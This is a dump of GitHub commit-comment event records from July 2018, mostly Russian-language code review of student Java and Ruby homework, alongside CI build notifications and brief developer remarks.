{"id":"8000455654","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework4"},"payload":{"comment":{"id":29793183,"position":38,"line":38,"path":"src/com/itacademy/zakharenkov/task2/Task2.java","commit_id":"2e263851def8da24513438bbd08116c86a25ab0d","created_at":"2018-07-22T16:07:12Z","updated_at":"2018-07-22T16:07:12Z","author_association":"NONE","body":"не совсем понятен смысл этой переменной, в твоем случае можно сразу в if и нулить i элемент, зачем еще один if и булеан переменная?"}},"created_at":"2018-07-22T16:07:12Z"}
{"id":"8000457062","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework4"},"payload":{"comment":{"id":29793185,"position":55,"line":55,"path":"src/com/itacademy/zakharenkov/task2/Task2.java","commit_id":"2e263851def8da24513438bbd08116c86a25ab0d","created_at":"2018-07-22T16:08:08Z","updated_at":"2018-07-22T16:08:08Z","author_association":"NONE","body":"в общем, усложняешь свои алгоритмы этой hasDuplicate"}},"created_at":"2018-07-22T16:08:08Z"}
{"id":"8000458330","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework4"},"payload":{"comment":{"id":29793194,"position":29,"line":29,"path":"src/com/itacademy/zakharenkov/task3/Task3.java","commit_id":"2e263851def8da24513438bbd08116c86a25ab0d","created_at":"2018-07-22T16:09:00Z","updated_at":"2018-07-22T16:09:00Z","author_association":"NONE","body":"зачем на каждой итерации вызывать функцию max? что-то может поменяться со временем?"}},"created_at":"2018-07-22T16:09:00Z"}
{"id":"8000458748","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793195,"position":3,"line":3,"path":"fibonacci.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T16:09:18Z","updated_at":"2018-07-22T16:09:18Z","author_association":"NONE","body":"это решение очень проблемное\r\n\r\n1. откуда-то взялись странные числа, которые не фигурировали в условии задачи и вообще неясно откуда взялись )) я про 32 в 1 строке\r\nполучается автор решения сделал какие-то рассчеты за программу, потом как-то что-то подставил и что-то как-то заработало... очень неочевидное, можно сказать магическое решение ;)\r\n2. 2 строка... сначала мы значит делаем работу, заполняем массив, потом удаляем ненужное... весьма неоптимально... нужно чтобы массив сразу заполнялся только \"правильными\" элементами\r\n3. не стоит так обильно использовать метод `inject`, да еще вложенный один в другой, да еще с аргументами\r\nесли внутренний вызов читается и понимается легко, то что делает внешний уже сложнее понять... (про цифру 32 уже писал выше)"}},"created_at":"2018-07-22T16:09:18Z"}
{"id":"8000459460","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework4"},"payload":{"comment":{"id":29793198,"position":27,"line":27,"path":"src/com/itacademy/zakharenkov/task4/task4.java","commit_id":"2e263851def8da24513438bbd08116c86a25ab0d","created_at":"2018-07-22T16:09:47Z","updated_at":"2018-07-22T16:09:47Z","author_association":"NONE","body":"а если у двумерного массива размер больше 2? "}},"created_at":"2018-07-22T16:09:47Z"}
{"id":"8000459658","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793201,"position":14,"line":14,"path":"months.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T16:09:56Z","updated_at":"2018-07-22T16:09:56Z","author_association":"NONE","body":"ключами в хеше, там где это возможно, лучше использовать символы\r\n- экономичней по памяти\r\n- легче набирать\r\n- проще читать\r\n- занимает меньше места в строке ))\r\n\r\nвместо\r\n```ruby\r\nhash = { 'abra' => 11, 'kadabra' => 33 }\r\n```\r\nлучше написать\r\n```ruby\r\nhash = { abra: 11, kadabra: 33 }\r\n```"}},"created_at":"2018-07-22T16:09:56Z"}
{"id":"8000460654","type":"CommitCommentEvent","actor":{"login":"shesek"},"repo":{"name":"ElementsProject/wordpress-lightning-publisher"},"payload":{"comment":{"id":29793205,"position":null,"line":null,"path":null,"commit_id":"57e240f09423faf3517ef8462f137edd57d6cb49","created_at":"2018-07-22T16:10:34Z","updated_at":"2018-07-22T16:10:34Z","author_association":"COLLABORATOR","body":"(refs https://github.com/ElementsProject/wordpress-lightning-publisher/issues/4)"}},"created_at":"2018-07-22T16:10:34Z"}
{"id":"8000461916","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework5"},"payload":{"comment":{"id":29793210,"position":64,"line":64,"path":"src/com/itacademy/zakharenkov/task2/Task2.java","commit_id":"2a8be3efa5d2a004da45d2960ebeaa6afef94012","created_at":"2018-07-22T16:11:23Z","updated_at":"2018-07-22T16:11:23Z","author_association":"NONE","body":"break в default"}},"created_at":"2018-07-22T16:11:23Z"}
{"id":"8000462043","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793211,"position":1,"line":1,"path":"vowels.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T16:11:29Z","updated_at":"2018-07-22T16:11:29Z","author_association":"NONE","body":"лучше вот так: `('a'..'z').to_a`"}},"created_at":"2018-07-22T16:11:29Z"}
{"id":"8000463140","type":"CommitCommentEvent","actor":{"login":"vim-ml"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29793214,"position":10,"line":64,"path":"runtime/mswin.vim","commit_id":"a9604e61451707b38fdcb088fbfaeea2b922fef6","created_at":"2018-07-22T16:12:06Z","updated_at":"2018-07-22T16:12:06Z","author_association":"NONE","body":"\nOn Sa, 21 Jul 2018, Bram Moolenaar wrote:\n\n> \n> > > +inoremap <C-S>\t\t<Esc>:update<CR>gi\n> > \n> > Doesn't that break in easy Vim?\n> \n> I don't think so, because the Esc isn't typed.  Have you tried it?\n\nYes, expecting it to break and I now I am wondering why this works. Ah, \nI see this is mentioned at `:h 'insertmode'`\n\nBest,\nChristian\n-- \nNach Wissen verlangen heißt im tiefsten Grunde immer: nach einem Sinn\ndes Lebens suchen.\n\t\t-- Margolius\n"}},"created_at":"2018-07-22T16:12:06Z"}
{"id":"8000463655","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793215,"position":4,"line":4,"path":"vowels.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T16:12:20Z","updated_at":"2018-07-22T16:12:20Z","author_association":"NONE","body":"про однобуквенные переменные уже писал\r\nлучше давать полноценные имена"}},"created_at":"2018-07-22T16:12:20Z"}
{"id":"8000464140","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793220,"position":3,"line":3,"path":"vowels.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T16:12:34Z","updated_at":"2018-07-22T16:12:34Z","author_association":"NONE","body":"потерялся пробел после \"равно\""}},"created_at":"2018-07-22T16:12:34Z"}
{"id":"8000466757","type":"CommitCommentEvent","actor":{"login":"fgaz"},"repo":{"name":"fgaz/nur-packages"},"payload":{"comment":{"id":29793227,"position":9,"line":20,"path":".travis.yml","commit_id":"0370edb4ef80587dcbded98fdd966f02476d0bfd","created_at":"2018-07-22T16:13:49Z","updated_at":"2018-07-22T16:13:49Z","author_association":"OWNER","body":"Good catch!"}},"created_at":"2018-07-22T16:13:49Z"}
{"id":"8000468851","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29793234,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-22T16:15:02Z","updated_at":"2018-07-22T16:15:02Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 153](https://teamcity.otenv.com/viewLog.html?buildId=8983238&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-22T16:15:02Z"}
{"id":"8000468994","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homework2"},"payload":{"comment":{"id":29793236,"position":18,"line":18,"path":"src/by/itacademy/projectshomeworks/HomeWork1Lesson4.java","commit_id":"60425f1985960f87c68323491f5fd4be6547400b","created_at":"2018-07-22T16:15:08Z","updated_at":"2018-07-22T16:15:08Z","author_association":"NONE","body":"лучше возвращать mirrorArray из твоего метода. Смысл его передавать вторым параметром?"}},"created_at":"2018-07-22T16:15:08Z"}
{"id":"8000469411","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29793240,"position":null,"line":null,"path":null,"commit_id":"b174daeec0299ed8db9ec76e264b27986c2de721","created_at":"2018-07-22T16:15:24Z","updated_at":"2018-07-22T16:15:24Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 56](https://teamcity.otenv.com/viewLog.html?buildId=8983244&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) is now running\n"}},"created_at":"2018-07-22T16:15:24Z"}
{"id":"8000470392","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29793244,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-22T16:16:01Z","updated_at":"2018-07-22T16:16:01Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 153](https://teamcity.otenv.com/viewLog.html?buildId=8983238&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **SUCCESS**\nSummary: Tests passed: 15 Build time: 00:00:59"}},"created_at":"2018-07-22T16:16:01Z"}
{"id":"8000471970","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29793251,"position":null,"line":null,"path":null,"commit_id":"b174daeec0299ed8db9ec76e264b27986c2de721","created_at":"2018-07-22T16:17:04Z","updated_at":"2018-07-22T16:17:04Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 56](https://teamcity.otenv.com/viewLog.html?buildId=8983244&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:40"}},"created_at":"2018-07-22T16:17:04Z"}
{"id":"8000473078","type":"CommitCommentEvent","actor":{"login":"ElPumpo"},"repo":{"name":"ESX-Org/esx_policejob"},"payload":{"comment":{"id":29793252,"position":45,"line":1955,"path":"client/main.lua","commit_id":"7ad20daf52f4049875dc6d740620dbc59e2a4e3f","created_at":"2018-07-22T16:17:51Z","updated_at":"2018-07-22T16:17:51Z","author_association":"MEMBER","body":"thanks for the heads up"}},"created_at":"2018-07-22T16:17:51Z"}
{"id":"8000473755","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homework2"},"payload":{"comment":{"id":29793253,"position":20,"line":20,"path":"src/by/itacademy/projectshomeworks/HomeWork1Lesson4.java","commit_id":"60425f1985960f87c68323491f5fd4be6547400b","created_at":"2018-07-22T16:18:17Z","updated_at":"2018-07-22T16:18:17Z","author_association":"NONE","body":"довольно сложно написано только ради того, чтобы в конечном итоге получить array.length % array.length, зато оригинально)"}},"created_at":"2018-07-22T16:18:17Z"}
{"id":"8000474261","type":"CommitCommentEvent","actor":{"login":"HMack101"},"repo":{"name":"bahelit/salmonpool-ui"},"payload":{"comment":{"id":29793254,"position":null,"line":null,"path":null,"commit_id":"61adb1139dd59674c3ac9391594493757d4298a4","created_at":"2018-07-22T16:18:36Z","updated_at":"2018-07-22T16:18:36Z","author_association":"COLLABORATOR","body":"There isn't a content folder.\n\nOn Sun, Jul 22, 2018, 10:51 AM Salmon Pool <notifications@github.com> wrote:\n\n> The content folder and its' contents didn't get added to the repository.\n>\n> Probably already know this but will mention it anyways, to do a blind add\n> of all the new files in your working directory to the repository run\n> git add -A\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/bahelit/salmonpool-ui/commit/61adb1139dd59674c3ac9391594493757d4298a4#commitcomment-29793095>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AK7dXY2Rb_0Mo6itVH4KBfBswcDr4rTuks5uJJ9ygaJpZM4VZwxl>\n> .\n>\n"}},"created_at":"2018-07-22T16:18:36Z"}
{"id":"8000474632","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homework2"},"payload":{"comment":{"id":29793259,"position":14,"line":14,"path":"src/by/itacademy/projectshomeworks/HomeWork1Lesson5.java","commit_id":"60425f1985960f87c68323491f5fd4be6547400b","created_at":"2018-07-22T16:18:54Z","updated_at":"2018-07-22T16:18:54Z","author_association":"NONE","body":"не за чем выводить на консоль в методе алгоритма твоего"}},"created_at":"2018-07-22T16:18:54Z"}
{"id":"8000474912","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"openstyles/stylus"},"payload":{"comment":{"id":29793260,"position":null,"line":null,"path":null,"commit_id":"03d02ad405ed58906426d8e5cd8a401e6ce1c851","created_at":"2018-07-22T16:19:06Z","updated_at":"2018-07-22T16:19:06Z","author_association":"NONE","body":":heart: :+1: "}},"created_at":"2018-07-22T16:19:06Z"}
{"id":"8000475001","type":"CommitCommentEvent","actor":{"login":"esukram"},"repo":{"name":"fub-dt/terraform-provider-opennebula"},"payload":{"comment":{"id":29793261,"position":193,"line":375,"path":"opennebula/resource_vm.go","commit_id":"6375926983ce82cea0c5bd60e6952d9b9f92940c","created_at":"2018-07-22T16:19:09Z","updated_at":"2018-07-22T16:19:09Z","author_association":"NONE","body":"Can `t` be `nil` as done in line 355?"}},"created_at":"2018-07-22T16:19:09Z"}
{"id":"8000475072","type":"CommitCommentEvent","actor":{"login":"ucLh"},"repo":{"name":"svnayden/RedOx"},"payload":{"comment":{"id":29793262,"position":null,"line":null,"path":null,"commit_id":"d40cef00f392ff2722df143fd9cafc7b933ed3e0","created_at":"2018-07-22T16:19:12Z","updated_at":"2018-07-22T16:19:12Z","author_association":"COLLABORATOR","body":"@zavalishin-arseniy , ты ведь в курсе, что этот код не запускается?"}},"created_at":"2018-07-22T16:19:12Z"}
{"id":"8000475481","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homework2"},"payload":{"comment":{"id":29793263,"position":24,"line":24,"path":"src/by/itacademy/projectshomeworks/HomeWork2Lesson4.java","commit_id":"60425f1985960f87c68323491f5fd4be6547400b","created_at":"2018-07-22T16:19:29Z","updated_at":"2018-07-22T16:19:29Z","author_association":"NONE","body":"main только для тестирования, выносим алгоритмы в отдельные функции"}},"created_at":"2018-07-22T16:19:29Z"}
{"id":"8000476933","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homework2"},"payload":{"comment":{"id":29793265,"position":17,"line":17,"path":"src/by/itacademy/projectshomeworks/HomeWork2Lesson5.java","commit_id":"60425f1985960f87c68323491f5fd4be6547400b","created_at":"2018-07-22T16:20:29Z","updated_at":"2018-07-22T16:20:29Z","author_association":"NONE","body":"не круто решать задачу перебором"}},"created_at":"2018-07-22T16:20:29Z"}
{"id":"8000478581","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homework2"},"payload":{"comment":{"id":29793266,"position":23,"line":23,"path":"src/by/itacademy/projectshomeworks/HomeWork3Lesson4.java","commit_id":"60425f1985960f87c68323491f5fd4be6547400b","created_at":"2018-07-22T16:21:37Z","updated_at":"2018-07-22T16:21:37Z","author_association":"NONE","body":"а если второй массив окажется больше первого?"}},"created_at":"2018-07-22T16:21:37Z"}
{"id":"8000489427","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29793301,"position":14,"line":14,"path":"src/com/itacademy/lesson5HomeWorkString/Task1.java","commit_id":"a54c2326481dcb91d00ec6f4d25e06de35d86830","created_at":"2018-07-22T16:29:27Z","updated_at":"2018-07-22T16:29:27Z","author_association":"NONE","body":"is* начинать надо булеан функции"}},"created_at":"2018-07-22T16:29:27Z"}
{"id":"8000490121","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29793304,"position":17,"line":17,"path":"src/com/itacademy/lesson5HomeWorkString/Task1.java","commit_id":"a54c2326481dcb91d00ec6f4d25e06de35d86830","created_at":"2018-07-22T16:29:57Z","updated_at":"2018-07-22T16:29:57Z","author_association":"NONE","body":"даже если нацело не делится, она все равно может быть полиндромом!"}},"created_at":"2018-07-22T16:29:57Z"}
{"id":"8000490163","type":"CommitCommentEvent","actor":{"login":"simrat39"},"repo":{"name":"simrat39/android_vendor_lineage"},"payload":{"comment":{"id":29793305,"position":null,"line":null,"path":null,"commit_id":"71ade693598340f76160ce09179abc721321c596","created_at":"2018-07-22T16:29:58Z","updated_at":"2018-07-22T16:29:58Z","author_association":"OWNER","body":"Stop stalking me "}},"created_at":"2018-07-22T16:29:58Z"}
{"id":"8000490219","type":"CommitCommentEvent","actor":{"login":"esukram"},"repo":{"name":"fub-dt/terraform-provider-opennebula"},"payload":{"comment":{"id":29793307,"position":193,"line":375,"path":"opennebula/resource_vm.go","commit_id":"6375926983ce82cea0c5bd60e6952d9b9f92940c","created_at":"2018-07-22T16:30:01Z","updated_at":"2018-07-22T16:30:01Z","author_association":"NONE","body":"Nvm, you fixed that in `ac9d023` ;)"}},"created_at":"2018-07-22T16:30:01Z"}
{"id":"8000490981","type":"CommitCommentEvent","actor":{"login":"nickhq"},"repo":{"name":"nickhq/job-finder"},"payload":{"comment":{"id":29793311,"position":null,"line":null,"path":null,"commit_id":"db4dee276f03730263b977e658580adc95036c32","created_at":"2018-07-22T16:30:27Z","updated_at":"2018-07-22T16:30:27Z","author_association":"OWNER","body":"awesome stuff"}},"created_at":"2018-07-22T16:30:27Z"}
{"id":"8000491467","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29793313,"position":34,"line":34,"path":"src/com/itacademy/lesson5HomeWorkString/Task2.java","commit_id":"a54c2326481dcb91d00ec6f4d25e06de35d86830","created_at":"2018-07-22T16:30:47Z","updated_at":"2018-07-22T16:30:47Z","author_association":"NONE","body":"лучше бы switch какой написать, а то перебором каждый с каждым не круто"}},"created_at":"2018-07-22T16:30:47Z"}
{"id":"8000492866","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29793316,"position":26,"line":26,"path":"src/com/itacademy/lesson6homeworkoop/Point.java","commit_id":"e56c57ff0546e23bbf902a3f82687e68466acb89","created_at":"2018-07-22T16:31:48Z","updated_at":"2018-07-22T16:31:48Z","author_association":"NONE","body":"нужно точку было передавать, а не две координаты\r\n"}},"created_at":"2018-07-22T16:31:48Z"}
{"id":"8000493177","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29793317,"position":3,"line":3,"path":"src/com/itacademy/lesson6homeworkoop/Rectangle.java","commit_id":"e56c57ff0546e23bbf902a3f82687e68466acb89","created_at":"2018-07-22T16:32:02Z","updated_at":"2018-07-22T16:32:02Z","author_association":"NONE","body":"отступ между классом и описанием полей"}},"created_at":"2018-07-22T16:32:02Z"}
{"id":"8000493270","type":"CommitCommentEvent","actor":{"login":"fasilminale"},"repo":{"name":"fasilminale/demo"},"payload":{"comment":{"id":29793318,"position":4,"line":9,"path":"index.html","commit_id":"5a8fc14e195f1281a6f8238f6c4884b61fe460ef","created_at":"2018-07-22T16:32:07Z","updated_at":"2018-07-22T16:32:07Z","author_association":"OWNER","body":"hey @nahomegetachew can u change module-nahome to module-girma"}},"created_at":"2018-07-22T16:32:07Z"}
{"id":"8000494388","type":"CommitCommentEvent","actor":{"login":"darkmord1991"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29793320,"position":24,"line":643,"path":"src/server/scripts/Spells/spell_paladin.cpp","commit_id":"5d7625b43621124c1d2f9ebff991e2249113e247","created_at":"2018-07-22T16:32:52Z","updated_at":"2018-07-22T16:32:52Z","author_association":"NONE","body":"25>c:\\users\\administrator\\desktop\\sources\\ashamanecore\\src\\server\\scripts\\spells\\spell_paladin.cpp(643): error C2065: \"player\": nichtdeklarierter Bezeichner\r\n25>c:\\users\\administrator\\desktop\\sources\\ashamanecore\\src\\server\\scripts\\spells\\spell_paladin.cpp(643): error C2227: Links von \"->CastSpell\" muss sich ein Zeiger auf Klassen-/Struktur-/Union-/generischen Typ befinden.\r\n25>c:\\users\\administrator\\desktop\\sources\\ashamanecore\\src\\server\\scripts\\spells\\spell_paladin.cpp(643): note: Typ ist \"unknown-type\"\r\n\r\nCompiling error"}},"created_at":"2018-07-22T16:32:52Z"}
{"id":"8000494399","type":"CommitCommentEvent","actor":{"login":"Suil3File"},"repo":{"name":"CocoaPods/CocoaPods"},"payload":{"comment":{"id":29793321,"position":null,"line":null,"path":null,"commit_id":"992dec7cc73a5493a92af492f759fcb0066e420a","created_at":"2018-07-22T16:32:52Z","updated_at":"2018-07-22T16:32:52Z","author_association":"NONE","body":"992dec7"}},"created_at":"2018-07-22T16:32:52Z"}
{"id":"8000494843","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29793324,"position":17,"line":17,"path":"src/com/itacademy/lesson6homeworkoop/Rectangle.java","commit_id":"e56c57ff0546e23bbf902a3f82687e68466acb89","created_at":"2018-07-22T16:33:11Z","updated_at":"2018-07-22T16:33:11Z","author_association":"NONE","body":"все равно не верно) нужно было просто на основании точек рассчитать, там не нужна диагональ"}},"created_at":"2018-07-22T16:33:11Z"}
{"id":"8000495288","type":"CommitCommentEvent","actor":{"login":"T-Software"},"repo":{"name":"T-Software/t-software2"},"payload":{"comment":{"id":29793325,"position":null,"line":null,"path":null,"commit_id":"ad2fdb143bde3cdbe0b9b88daa31df01197e5183","created_at":"2018-07-22T16:33:31Z","updated_at":"2018-07-22T16:33:31Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-22T16:33:31Z"}
{"id":"8000495411","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29793326,"position":22,"line":22,"path":"src/com/itacademy/lesson6homeworkoop/Rectangle.java","commit_id":"e56c57ff0546e23bbf902a3f82687e68466acb89","created_at":"2018-07-22T16:33:36Z","updated_at":"2018-07-22T16:33:36Z","author_association":"NONE","body":"у тебя есть диагональ в классе Point, просто этот метод надо было заюзать и все"}},"created_at":"2018-07-22T16:33:36Z"}
{"id":"8000495568","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793327,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-22T16:33:43Z","updated_at":"2018-07-22T16:33:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T16:33:43Z"}
{"id":"8000499127","type":"CommitCommentEvent","actor":{"login":"dipinjain"},"repo":{"name":"dipinjain/mtwa"},"payload":{"comment":{"id":29793334,"position":null,"line":null,"path":null,"commit_id":"0939ee1cd8706b961008812831bb2f9a776988a8","created_at":"2018-07-22T16:36:15Z","updated_at":"2018-07-22T16:36:15Z","author_association":"OWNER","body":"new"}},"created_at":"2018-07-22T16:36:15Z"}
{"id":"8000501561","type":"CommitCommentEvent","actor":{"login":"declanjcurrey"},"repo":{"name":"caitlinalmond/GameOfThrones"},"payload":{"comment":{"id":29793335,"position":null,"line":null,"path":null,"commit_id":"5244dab5d94707715afc24846efb707cd0ce1a26","created_at":"2018-07-22T16:38:04Z","updated_at":"2018-07-22T16:38:04Z","author_association":"COLLABORATOR","body":"Will explain what I've done here, it's just removing index.php from the url bar so its not for example:\r\n\r\ndomain.com/index.php/home\r\n\r\ninstead it will not be\r\n\r\ndomain.com/home"}},"created_at":"2018-07-22T16:38:04Z"}
{"id":"8000502137","type":"CommitCommentEvent","actor":{"login":"nahomegetachew"},"repo":{"name":"fasilminale/demo"},"payload":{"comment":{"id":29793336,"position":4,"line":9,"path":"index.html","commit_id":"5a8fc14e195f1281a6f8238f6c4884b61fe460ef","created_at":"2018-07-22T16:38:30Z","updated_at":"2018-07-22T16:38:30Z","author_association":"COLLABORATOR","body":"ok"}},"created_at":"2018-07-22T16:38:30Z"}
{"id":"8000502836","type":"CommitCommentEvent","actor":{"login":"frostfire11"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29793337,"position":24,"line":643,"path":"src/server/scripts/Spells/spell_paladin.cpp","commit_id":"5d7625b43621124c1d2f9ebff991e2249113e247","created_at":"2018-07-22T16:39:03Z","updated_at":"2018-07-22T16:39:03Z","author_association":"NONE","body":"rewerite it like this:\r\n`        if (Unit* player = caster->ToPlayer())\r\n        {\r\n            if (GetSpellInfo()->Id == SPELL_HAMMER_OF_RIGHTEOUS)\r\n                if (caster->FindNearestCreature(43499, 8) && caster->HasAura(SPELL_PALADIN_CONSECRATION))\r\n                    player->CastSpell(player, SPELL_HAMMER_OF_RIGHTEOUS_LIGHT_WAVE, true);\r\n        }`"}},"created_at":"2018-07-22T16:39:03Z"}
{"id":"8000503319","type":"CommitCommentEvent","actor":{"login":"esukram"},"repo":{"name":"fub-dt/terraform-provider-opennebula"},"payload":{"comment":{"id":29793338,"position":172,"line":354,"path":"opennebula/resource_vm.go","commit_id":"6375926983ce82cea0c5bd60e6952d9b9f92940c","created_at":"2018-07-22T16:39:25Z","updated_at":"2018-07-22T16:39:25Z","author_association":"NONE","body":"Ignoring the returned error from `Token()` is that on purpose and when yes, why?"}},"created_at":"2018-07-22T16:39:25Z"}
{"id":"8000504979","type":"CommitCommentEvent","actor":{"login":"TingPing"},"repo":{"name":"flathub/io.github.OpenToonz"},"payload":{"comment":{"id":29793342,"position":null,"line":null,"path":null,"commit_id":"bef94eaf21d4d23f6e5638d411b7c747d0bc2306","created_at":"2018-07-22T16:40:36Z","updated_at":"2018-07-22T16:40:36Z","author_association":"MEMBER","body":"Versions in flatpak are strings, a floating point value of `5.9` is meaningless. I'm guessing it works by accident."}},"created_at":"2018-07-22T16:40:36Z"}
{"id":"8000506029","type":"CommitCommentEvent","actor":{"login":"StoneSet"},"repo":{"name":"retrobox/api"},"payload":{"comment":{"id":29793343,"position":null,"line":null,"path":null,"commit_id":"476d071b39d416aabe6d14d2191af7a5c6333604","created_at":"2018-07-22T16:41:20Z","updated_at":"2018-07-22T16:41:20Z","author_association":"MEMBER","body":"c'est THE commit"}},"created_at":"2018-07-22T16:41:20Z"}
{"id":"8000506395","type":"CommitCommentEvent","actor":{"login":"TheStrechh"},"repo":{"name":"wloot/device_xiaomi_msm8956-common"},"payload":{"comment":{"id":29793344,"position":null,"line":null,"path":null,"commit_id":"67d1a5356f41b8d3888c15098f6b03b0a1ea525d","created_at":"2018-07-22T16:41:37Z","updated_at":"2018-07-22T16:41:37Z","author_association":"NONE","body":"lol why?\r\n"}},"created_at":"2018-07-22T16:41:37Z"}
{"id":"8000507809","type":"CommitCommentEvent","actor":{"login":"alaviss"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29793347,"position":38,"line":38,"path":"x11-libs/libxcursor/libxcursor-1.1.15.recipe","commit_id":"a546a4746ec6d93def15cae2a6d8aaa633c27f89","created_at":"2018-07-22T16:42:37Z","updated_at":"2018-07-22T16:42:37Z","author_association":"CONTRIBUTOR","body":"Uhmmm, this doesn't exists in our tree. How does this package even built @fbrosson?"}},"created_at":"2018-07-22T16:42:37Z"}
